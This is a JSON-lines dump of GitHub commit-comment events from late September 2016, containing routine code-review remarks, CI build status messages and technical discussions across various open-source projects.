{"id":"4631704342","type":"CommitCommentEvent","actor":{"login":"jheeffer"},"repo":{"name":"vizabi/vizabi"},"payload":{"comment":{"id":19209993,"position":null,"line":null,"path":null,"commit_id":"408c9f79cad46e38ba7d0df2c4060590fee4927c","created_at":"2016-09-28T16:07:45Z","updated_at":"2016-09-28T16:07:45Z","body":"Did you add unminized d3.js instead of d3.min.js on purpose in this commit?"}},"created_at":"2016-09-28T16:07:45Z"}
{"id":"4631706539","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210001,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:08:05Z","updated_at":"2016-09-28T16:08:05Z","body":"> Simple, give the option to turn off the warning in the annotation\r\n\r\nThis is the equivalent of making the handler method public. If it's public then it can be overridden, if it's private then it cannot. If a derived class defines a conflicting injector, then the conflicting injector is conformed to a different name anyway.\r\n\r\n> Time-wise, most testing is performed in the IDE as it'll always be slower than production so if we see big gains in the IDE production, by association, benefits as well.\r\n\r\nThere is no performance concern here at all. Basically the only concern is that for people like me who have missing `@Override` set to *error*, the IDE will complain about the missing annotation, even though at runtime no override actually occurs.\r\n\r\n> The time spent figuring out that its just a poorly wrote injector that only affects IDE mode is, in my opinion, not worth the hassle as blood or myself will most definitely forget this \"lesson\" and blow man hours wondering why the hell this is broke.\r\n\r\nThis is why I removed the debug option to disable conforming, because it was the only circumstance when this became a problem. In terms of style, the injector handlers should basically just be private whenever there's no reason for them to be otherwise, but this is a purely good-practice manoeuvre, and has no effect on performance or stability, only my sanity when my IDE bitches about the missing `@Override` annotation."}},"created_at":"2016-09-28T16:08:05Z"}
{"id":"4631711526","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19210012,"position":null,"line":null,"path":null,"commit_id":"65af9b8a623de6faa71c39ca0b9583a69c2d1fc3","created_at":"2016-09-28T16:08:52Z","updated_at":"2016-09-28T16:08:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1193](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14486&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T16:08:52Z"}
{"id":"4631711548","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19210011,"position":null,"line":null,"path":null,"commit_id":"a31ac780024ab538b2288748b26335125bf4a8ca","created_at":"2016-09-28T16:08:52Z","updated_at":"2016-09-28T16:08:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1192](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14487&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T16:08:52Z"}
{"id":"4631713032","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19210017,"position":12,"line":18,"path":"movie.rb","commit_id":"26ce0d24634ee0d6b1475d311cf34f2ef80b0fe1","created_at":"2016-09-28T16:09:07Z","updated_at":"2016-09-28T16:09:07Z","body":"`@date = ` можно перед `if`ом написать, чтобы не повторяться (и чтобы видно было, что весь `if` вычисляет одну переменную). Ещё можно тут `case` применить ;)"}},"created_at":"2016-09-28T16:09:07Z"}
{"id":"4631719377","type":"CommitCommentEvent","actor":{"login":"MusicMonkey5555"},"repo":{"name":"MusicMonkey5555/round10"},"payload":{"comment":{"id":19210034,"position":null,"line":null,"path":null,"commit_id":"583de6f0df274bc0f94e906e688f5c465c899472","created_at":"2016-09-28T16:10:07Z","updated_at":"2016-09-28T16:10:07Z","body":"Guess this breaks the option of rounding to the right or the left of the decimal place:\r\n> round10(184.008, 2)\r\n200\r\n> round10(184.008, -2)\r\n184.01\r\nBut on the other hand it makes it more consistent with toFixed or other rounding functions"}},"created_at":"2016-09-28T16:10:07Z"}
{"id":"4631720855","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19210039,"position":25,"line":28,"path":"movie.rb","commit_id":"26ce0d24634ee0d6b1475d311cf34f2ef80b0fe1","created_at":"2016-09-28T16:10:20Z","updated_at":"2016-09-28T16:10:20Z","body":"`month` лучше сделать методом, а не вычислять в конструкторе (у нас класс хранит данные, составляющие его суть; а месяц — это не суть, он вычисляется из тех данных, что у нас уже есть)"}},"created_at":"2016-09-28T16:10:20Z"}
{"id":"4631724100","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19210043,"position":14,"line":40,"path":"movie.rb","commit_id":"dfeccf81d45aedaf2935f3bcaa60ab417805e28d","created_at":"2016-09-28T16:10:50Z","updated_at":"2016-09-28T16:10:50Z","body":"return и скобки — лишние :)"}},"created_at":"2016-09-28T16:10:50Z"}
{"id":"4631725652","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19210047,"position":5,"line":20,"path":"movie_collection.rb","commit_id":"dfeccf81d45aedaf2935f3bcaa60ab417805e28d","created_at":"2016-09-28T16:11:04Z","updated_at":"2016-09-28T16:11:04Z","body":":+1: "}},"created_at":"2016-09-28T16:11:04Z"}
{"id":"4631727806","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19210055,"position":23,"line":27,"path":"movie_collection.rb","commit_id":"dfeccf81d45aedaf2935f3bcaa60ab417805e28d","created_at":"2016-09-28T16:11:23Z","updated_at":"2016-09-28T16:11:23Z","body":":+1: "}},"created_at":"2016-09-28T16:11:23Z"}
{"id":"4631728833","type":"CommitCommentEvent","actor":{"login":"globin"},"repo":{"name":"errbotio/errbot"},"payload":{"comment":{"id":19210060,"position":8,"line":28,"path":"errbot/templates/card.md","commit_id":"7cf98dfe498a70595950e2ed9ab9ba29bfa1586c","created_at":"2016-09-28T16:11:32Z","updated_at":"2016-09-28T16:11:32Z","body":"Where does this syntax come from? This renders verbatim with the XMPP backend, and according to #803 on IRC, too."}},"created_at":"2016-09-28T16:11:32Z"}
{"id":"4631732468","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210070,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:12:07Z","updated_at":"2016-09-28T16:12:07Z","body":"@Mumfrey \r\n\r\nhttps://github.com/SpongePowered/SpongeCommon/blob/bleeding/src/main/java/org/spongepowered/common/mixin/core/block/MixinBlock.java#L106\r\n\r\nBefore this commit, would Mixin still apply the above injector as well as the injector in MixinBlockLeaves in both IDE and production?"}},"created_at":"2016-09-28T16:12:07Z"}
{"id":"4631733130","type":"CommitCommentEvent","actor":{"login":"hagata"},"repo":{"name":"hagata/prototype_playground"},"payload":{"comment":{"id":19210071,"position":null,"line":null,"path":null,"commit_id":"3185c43b94e760dd11add33514588d4bb050a108","created_at":"2016-09-28T16:12:13Z","updated_at":"2016-09-28T16:12:13Z","body":"Resolves #1 "}},"created_at":"2016-09-28T16:12:13Z"}
{"id":"4631734919","type":"CommitCommentEvent","actor":{"login":"simon816"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210076,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:12:30Z","updated_at":"2016-09-28T16:12:30Z","body":"When I first discovered this same issue with injectors overriding each other, I suggested to add an annotation to declare that overriding is intended. (I suggested `@OverrideInjection`)\r\nhttps://github.com/SpongePowered/Mixin/pull/27"}},"created_at":"2016-09-28T16:12:30Z"}
{"id":"4631735127","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19210079,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T16:12:32Z","updated_at":"2016-09-28T16:12:32Z","body":">\n> Any reason why you use it for other things? Do you want that decorations\n> looks different between csd and\n> ssd windows?\n>\n> Yes. I need the different button images, spacings, shadows, and borders...\n> Because SSDs window-frames only contain .title and .titlebutton, so we\n> can save the vertical spacing with tiny titlebutton images like I've done.\n>\n\nI think this is not 100% correct. Also CSD windows might have only .title\nand .titlebutton. This is called .default-decoration... So to save space\nyou don't need .ssd.\n\nCSS nodes and classes in Metacity:\n> window.background.csd\n>\n>    - decoration\n>    - headerbar.titlebar.horizontal.default-decoration ++ label.title ++\n>    button.titlebutton +++ image\n>\n> Thanks for your info. I think you'd better to do documenting them, or\n> already done?\n>\nNo and it really should not be needed.\n"}},"created_at":"2016-09-28T16:12:32Z"}
{"id":"4631739781","type":"CommitCommentEvent","actor":{"login":"pichalite"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":19210089,"position":null,"line":null,"path":null,"commit_id":"c8e5f52d9fa5cefd1cbe3613904ffa24b4aeb803","created_at":"2016-09-28T16:13:17Z","updated_at":"2016-09-28T16:13:17Z","body":"This will force this behavior on all themes even if they don't want it. Material theme for example doesn't open modal window for chats on mobile. Has a different UI.\r\n\r\nThis was moved to be taken care of at the theme level https://github.com/NodeBB/nodebb-theme-persona/blob/master/lib/client/chats.js\r\n\r\nWhatever is broken that's not triggering code in this file needs to be fixed instead of breaking other themes."}},"created_at":"2016-09-28T16:13:17Z"}
{"id":"4631740058","type":"CommitCommentEvent","actor":{"login":"dbatiste"},"repo":{"name":"Brightspace/d2l-icons-ui"},"payload":{"comment":{"id":19210091,"position":5,"line":39,"path":"d2l-icon-button-shared-styles.html","commit_id":"5a08f117ab29ff1594740176763a3b3541e17565","created_at":"2016-09-28T16:13:20Z","updated_at":"2016-09-28T16:13:20Z","body":"It was either Alex or Dana - I don't recall which.  Menu items currently use 0.75 for the disabled state.  Color contrast was the rationale."}},"created_at":"2016-09-28T16:13:20Z"}
{"id":"4631742574","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19210101,"position":null,"line":null,"path":null,"commit_id":"107b3de2ae987845d5bef25008f6bf4f663f1b4b","created_at":"2016-09-28T16:13:43Z","updated_at":"2016-09-28T16:13:43Z","body":"reportSLn could be implemented as a pure function, using some unsafePerformIO magic (and an IORef for the Verbose trie thing).  However, I do not know how to do this for interaction mode.  Maybe we should have some reporting that just goes into a log file, then we are not dependent to be in a monad."}},"created_at":"2016-09-28T16:13:43Z"}
{"id":"4631743172","type":"CommitCommentEvent","actor":{"login":"petterreinholdtsen"},"repo":{"name":"b3/battery-stats"},"payload":{"comment":{"id":19210103,"position":null,"line":null,"path":null,"commit_id":"7ea441d1295abbe83a80323f40a27732d6d52553","created_at":"2016-09-28T16:13:49Z","updated_at":"2016-09-28T16:13:49Z","body":"What about sending the message to stderr instead?  In other words, add 1>&2 at the end of the echo line?  Will it solve your problem too?\r\n\r\nNot that I am against adding state 0.  I am just unsure if the missing power supply should cause a cron email or not."}},"created_at":"2016-09-28T16:13:49Z"}
{"id":"4631743742","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19210105,"position":null,"line":null,"path":null,"commit_id":"48af04a01cd5a7c4b970404184af3d52c01d6625","created_at":"2016-09-28T16:13:53Z","updated_at":"2016-09-28T16:13:53Z","body":"![giphy](https://cloud.githubusercontent.com/assets/900690/18922006/4cb6e278-85a7-11e6-8412-a8a1f1f9b5ad.gif)\r\n"}},"created_at":"2016-09-28T16:13:53Z"}
{"id":"4631745774","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19210109,"position":32,"line":28,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T16:14:15Z","updated_at":"2016-09-28T16:14:15Z","body":"Ma più che attivisti, almeno a guardare la definizione su WordReference, a me sembra proprio con le persone comuni e le associazioni. Una volta avevo messo società civile ma Sara mi aveva fatto notare che poteva avere una connotazione un po' troppo politica.\r\nE anche istituzioni per me è  meglio di istituzioni.\r\n\r\nDefinizione di WordReferece:\r\n```\r\ngrassroots adj figurative (fundamental) di fondo avv\r\ndi base avv\r\ngrassroots adj figurative (of the common people) popolare agg\r\na livello popolare avv\r\ngrass roots n figurative (origin, foundation) figurato radici, origini nfpl\r\ngrass roots n (ordinary people, local members of a group) di movimenti, partiti etc. base nf\r\nsocietà civile, gente comune nf\r\ngrassroots campaign campagna portata avanti dalla gente comune\r\ngrassroots organisation, grassroots organization n (local political group or movement) movimento di base nm\r\n```"}},"created_at":"2016-09-28T16:14:15Z"}
{"id":"4631747546","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210112,"position":null,"line":null,"path":null,"commit_id":"e10aefb982f1373364cced5ca82a80e6ab0b1de3","created_at":"2016-09-28T16:14:32Z","updated_at":"2016-09-28T16:14:32Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T16:14:32Z"}
{"id":"4631748312","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19210115,"position":null,"line":null,"path":null,"commit_id":"3a2283f7d92fc8064622d37a32e11a084f2a43b8","created_at":"2016-09-28T16:14:40Z","updated_at":"2016-09-28T16:14:40Z","body":"Thanks "}},"created_at":"2016-09-28T16:14:40Z"}
{"id":"4631748647","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210117,"position":null,"line":null,"path":null,"commit_id":"e10aefb982f1373364cced5ca82a80e6ab0b1de3","created_at":"2016-09-28T16:14:44Z","updated_at":"2016-09-28T16:14:44Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T16:14:44Z"}
{"id":"4631750947","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19210121,"position":null,"line":null,"path":null,"commit_id":"e7f6bf7e37d7f701295eba4443a6bea80078eaed","created_at":"2016-09-28T16:15:07Z","updated_at":"2016-09-28T16:15:07Z","body":"hahaha this one is for you @cybrann"}},"created_at":"2016-09-28T16:15:07Z"}
{"id":"4631756108","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19210135,"position":36,"line":620,"path":"pcsx2/ps2/pgif.cpp","commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T16:15:55Z","updated_at":"2016-09-28T16:15:55Z","body":"One (addr != PGIF_CTRL) too many, yea. It's for debugging problems while we improve PGIF. It won't stay in PCSX2 for long so I'll leave it as is."}},"created_at":"2016-09-28T16:15:55Z"}
{"id":"4631758175","type":"CommitCommentEvent","actor":{"login":"sim2github"},"repo":{"name":"trntv/yii2-starter-kit"},"payload":{"comment":{"id":19210140,"position":null,"line":null,"path":null,"commit_id":"220c77389e9072ecace8cc4bfc51063d3ec24dc7","created_at":"2016-09-28T16:16:15Z","updated_at":"2016-09-28T16:16:15Z","body":"And one more time - `docker-compose run app console/yii app/setup`"}},"created_at":"2016-09-28T16:16:15Z"}
{"id":"4631759671","type":"CommitCommentEvent","actor":{"login":"jameshiebert"},"repo":{"name":"pacificclimate/Rudunits2"},"payload":{"comment":{"id":19210143,"position":2,"line":1,"path":"R/ud.functions.R","commit_id":"298e789729cf8388203fcfe07a6870cfbad2eee3","created_at":"2016-09-28T16:16:29Z","updated_at":"2016-09-28T16:16:29Z","body":"We had it as `.onLoad` in the 0.9 release which got rejected by CRAN. From Uwe Ligges:"}},"created_at":"2016-09-28T16:16:29Z"}
{"id":"4631760248","type":"CommitCommentEvent","actor":{"login":"irond13"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19210145,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T16:16:34Z","updated_at":"2016-09-28T16:16:34Z","body":"@ejcx In our case, we had specified a custom origin, but left credentials to the default (which we have now explicitly set to true)\r\n@mikermcneil thanks! "}},"created_at":"2016-09-28T16:16:34Z"}
{"id":"4631760294","type":"CommitCommentEvent","actor":{"login":"carlosormeno"},"repo":{"name":"carlosormeno/Java_again"},"payload":{"comment":{"id":19210146,"position":null,"line":null,"path":null,"commit_id":"7adb45799ff3badff3296437216eeef4086e2260","created_at":"2016-09-28T16:16:35Z","updated_at":"2016-09-28T16:16:35Z","body":"Test"}},"created_at":"2016-09-28T16:16:35Z"}
{"id":"4631765797","type":"CommitCommentEvent","actor":{"login":"b3"},"repo":{"name":"b3/battery-stats"},"payload":{"comment":{"id":19210167,"position":null,"line":null,"path":null,"commit_id":"7ea441d1295abbe83a80323f40a27732d6d52553","created_at":"2016-09-28T16:17:23Z","updated_at":"2016-09-28T16:17:23Z","body":"That was my first reaction but I think it is not that nice in the way `battery-stats-collector` is used.\r\nIt will surely solve the problem of the log file but I assume the message will then be captured by `cron` and send as email to `root` (every minute if I guess it right)."}},"created_at":"2016-09-28T16:17:23Z"}
{"id":"4631768103","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19210170,"position":null,"line":null,"path":null,"commit_id":"0aa75206705afc71b991cceeede644c87088d583","created_at":"2016-09-28T16:17:45Z","updated_at":"2016-09-28T16:17:45Z","body":"I put rsync back to to 16.09 as well 5e86b8a1d. If we remove it (and I would be fine with it), master should go first and we should put it into release notes."}},"created_at":"2016-09-28T16:17:45Z"}
{"id":"4631769373","type":"CommitCommentEvent","actor":{"login":"normanmaurer"},"repo":{"name":"netty/netty-tcnative"},"payload":{"comment":{"id":19210173,"position":null,"line":null,"path":null,"commit_id":"2f7d38fa68b007c3f761d226e09cc6ec0efc9b97","created_at":"2016-09-28T16:17:58Z","updated_at":"2016-09-28T16:17:58Z","body":"Let me take care... that said we NOT publish jars that are static linked against OpenSSL.\n\n> Am 28.09.2016 um 17:45 schrieb testn <notifications@github.com>:\n> \n> Need to upgrade this to 1.0.2j since 1.0.2i is impacted by https://www.openssl.org/news/vulnerabilities.html#2016-7052\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-28T16:17:58Z"}
{"id":"4631773046","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19210179,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T16:18:33Z","updated_at":"2016-09-28T16:18:33Z","body":">\n> So now I only have a thing as issue:\n>\n> Window-manager ignores margins outside of button.titlebutton style-class,\n> it means Metacity will ignore the headerbar geometry if theme designers\n> employed margin property to define the height of headerbar node. On the\n> other hand, Mutter is OK because we can set specific spacing factors into\n> .ssd .titlebar style-class with padding property.\n>\n> But it seems to be related to Mutter as well, let me know if I should file\n> a report to Metacity at bugzilla... :)\n>\n\nIt looks like .titlebutton { margin: 10px 4px; } should work.\n"}},"created_at":"2016-09-28T16:18:33Z"}
{"id":"4631775390","type":"CommitCommentEvent","actor":{"login":"itaimal"},"repo":{"name":"Rocket-Team/Freeven"},"payload":{"comment":{"id":19210190,"position":null,"line":null,"path":null,"commit_id":"6e1e8d041ac0c4eb97f5fb579d0ead5b6876cc5a","created_at":"2016-09-28T16:18:56Z","updated_at":"2016-09-28T16:18:56Z","body":"Estuve revisando y el error se presenta por estas variables,\r\n     \r\n        'NAME': os.environ['DATABASE_NAME'],\r\n        'USER': os.environ['DATABASE_USER'],\r\n        'PASSWORD': os.environ['DATABASE_PASSWORD'],\r\n        'HOST': os.environ['DATABASE_HOST'],\r\n        'PORT': os.environ['DATABASE_PORT'],\r\n\r\nhay que agregarlas al Config Variables de heroku y ademas son necesarias para poner a andar el ambiente local.\r\n\r\napenas pueda me regala un correo con las variables\r\n\r\nhttps://dashboard.heroku.com/apps/freeven/settings"}},"created_at":"2016-09-28T16:18:56Z"}
{"id":"4631780845","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210199,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:19:47Z","updated_at":"2016-09-28T16:19:47Z","body":"> Before this commit, would Mixin still apply the above injector as well as the injector in MixinBlockLeaves in both IDE and production?\r\n\r\nYes, and when I said IDE above I meant **IDE warnings**, nothing to do with running in dev or in production. I meant explicitly *in the IDE*, eg. in the Eclipse \"Problems\" view. The behaviour was only ever altered by the debug option which disabled the remapper, which as I said I have now removed because it was frankly stupid to be able to disable something so fundamental to injectors working properly.\r\n\r\n> When I first discovered this same issue with injectors overriding each other, I suggested to add an annotation to declare that overriding is intended. (I suggested @OverrideInjection)\r\n> SpongePowered/Mixin#27\r\n\r\nAnd if you read my reply in that issue, you will see that I pointed out this is intentional. I mean, this is **Java**, the access modifier isn't just a decorative item, it's designed to indicate the nature of a method. Unfortunately this isn't C++ and `virtual` isn't required to make something virtual: any `protected` or `public` method is implicitly virtual and thus normal override rules apply for it. The exception to this rule being that a derived injector is always unique, thanks to conforming done by the preprocessor."}},"created_at":"2016-09-28T16:19:47Z"}
{"id":"4631782156","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210203,"position":null,"line":null,"path":null,"commit_id":"e10aefb982f1373364cced5ca82a80e6ab0b1de3","created_at":"2016-09-28T16:20:00Z","updated_at":"2016-09-28T16:20:00Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e10aefb982f1373364cced5ca82a80e6ab0b1de3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-28T16:20:00Z"}
{"id":"4631784466","type":"CommitCommentEvent","actor":{"login":"chinmaygarde"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":19210212,"position":4,"line":205,"path":"runtime/vm/BUILD.gn","commit_id":"b29788329baab1183f6e430bc2cf3c4169b20621","created_at":"2016-09-28T16:20:23Z","updated_at":"2016-09-28T16:20:23Z","body":"> please try to run //tools/gn.py on Linux in a Dart checkout\r\n\r\nUnderstood.\r\n\r\n> I'll look into why this is broken\r\n\r\nWe had to add this after we updated GN itself. We were using a very old version of GN. This has now been updated to https://chromium.googlesource.com/chromium/buildtools/+/3d2e47bf14e4e67816a53e304dea422fa18f9180/linux64/gn.sha1."}},"created_at":"2016-09-28T16:20:23Z"}
{"id":"4631787822","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19210219,"position":null,"line":null,"path":null,"commit_id":"65af9b8a623de6faa71c39ca0b9583a69c2d1fc3","created_at":"2016-09-28T16:20:56Z","updated_at":"2016-09-28T16:20:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1193](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14486&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:12:04"}},"created_at":"2016-09-28T16:20:56Z"}
{"id":"4631788907","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19210223,"position":null,"line":null,"path":null,"commit_id":"a31ac780024ab538b2288748b26335125bf4a8ca","created_at":"2016-09-28T16:21:07Z","updated_at":"2016-09-28T16:21:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1192](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14487&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:12:14"}},"created_at":"2016-09-28T16:21:07Z"}
{"id":"4631789022","type":"CommitCommentEvent","actor":{"login":"doowruc"},"repo":{"name":"infrabel/GNaP.Data.Scope.EntityFramework"},"payload":{"comment":{"id":19210224,"position":null,"line":null,"path":null,"commit_id":"c47e02a9c33a1e3e90b1d5d0e09215ac2f2b0234","created_at":"2016-09-28T16:21:08Z","updated_at":"2016-09-28T16:21:08Z","body":"This appears to now be broken when using with Unity\r\n\r\nI am now unable to wire up IDbScopeFactory, EntityFrameworkScopeFactory as EntityFrameworkScopeFactory  now requires IDbFactory  on construction and there is no class to implement this.\r\n\r\n"}},"created_at":"2016-09-28T16:21:08Z"}
{"id":"4631792586","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19210230,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-28T16:21:41Z","updated_at":"2016-09-28T16:21:41Z","body":"Yeah, and in Double-Ratchet [wiki](https://github.com/trevp/double_ratchet/wiki) it mentioned\r\n> Header encryption may be omitted if the underlying transport is already leaking metadata, and space is at a premium.\r\n\r\nBut we are still considering an encryption of DH public keys, this seems an approach that we can defend ECDH Corruption or PQ case."}},"created_at":"2016-09-28T16:21:41Z"}
{"id":"4631795067","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210234,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:22:04Z","updated_at":"2016-09-28T16:22:04Z","body":"@Mumfrey \r\n\r\nIn that case, fine by me. I'll leave you to your IDE warnings squabbles :P."}},"created_at":"2016-09-28T16:22:04Z"}
{"id":"4631799277","type":"CommitCommentEvent","actor":{"login":"prometheanfire"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":19210239,"position":null,"line":null,"path":null,"commit_id":"dacab57e33c5cf272aa95607ebfcbc4ff927703f","created_at":"2016-09-28T16:22:44Z","updated_at":"2016-09-28T16:22:44Z","body":"and done"}},"created_at":"2016-09-28T16:22:44Z"}
{"id":"4631803956","type":"CommitCommentEvent","actor":{"login":"Mumfrey"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19210252,"position":null,"line":null,"path":null,"commit_id":"56ad30d47e82ee8175583988f94bc8c4c90558fd","created_at":"2016-09-28T16:23:33Z","updated_at":"2016-09-28T16:23:33Z","body":"> In that case, fine by me. I'll leave you to your IDE warnings squabbles :P.\r\n\r\n\"Just because you're paranoid doesn't mean they aren't out to get you.\"\r\n\r\nI'm gonna leave my IDE warnings turned right up to 11 thank you very much!"}},"created_at":"2016-09-28T16:23:33Z"}
{"id":"4631804106","type":"CommitCommentEvent","actor":{"login":"magneticflux-"},"repo":{"name":"Pattonville-App-Development-Team/Android-App"},"payload":{"comment":{"id":19210253,"position":null,"line":null,"path":null,"commit_id":"e2a063949ddabd007ce5fc6c215f32b3a1b14418","created_at":"2016-09-28T16:23:35Z","updated_at":"2016-09-28T16:23:35Z","body":"It finally worked!"}},"created_at":"2016-09-28T16:23:35Z"}
{"id":"4631805214","type":"CommitCommentEvent","actor":{"login":"sdsanders"},"repo":{"name":"sdsanders/ionic-native"},"payload":{"comment":{"id":19210258,"position":null,"line":null,"path":null,"commit_id":"7a53d0c94cf57c988556e489e4759af47895cd2e","created_at":"2016-09-28T16:23:46Z","updated_at":"2016-09-28T16:23:46Z","body":"This is included in the push plugin typings but is missing from Ionic Native: https://github.com/DefinitelyTyped/DefinitelyTyped/blob/master/phonegap-plugin-push/phonegap-plugin-push.d.ts"}},"created_at":"2016-09-28T16:23:46Z"}
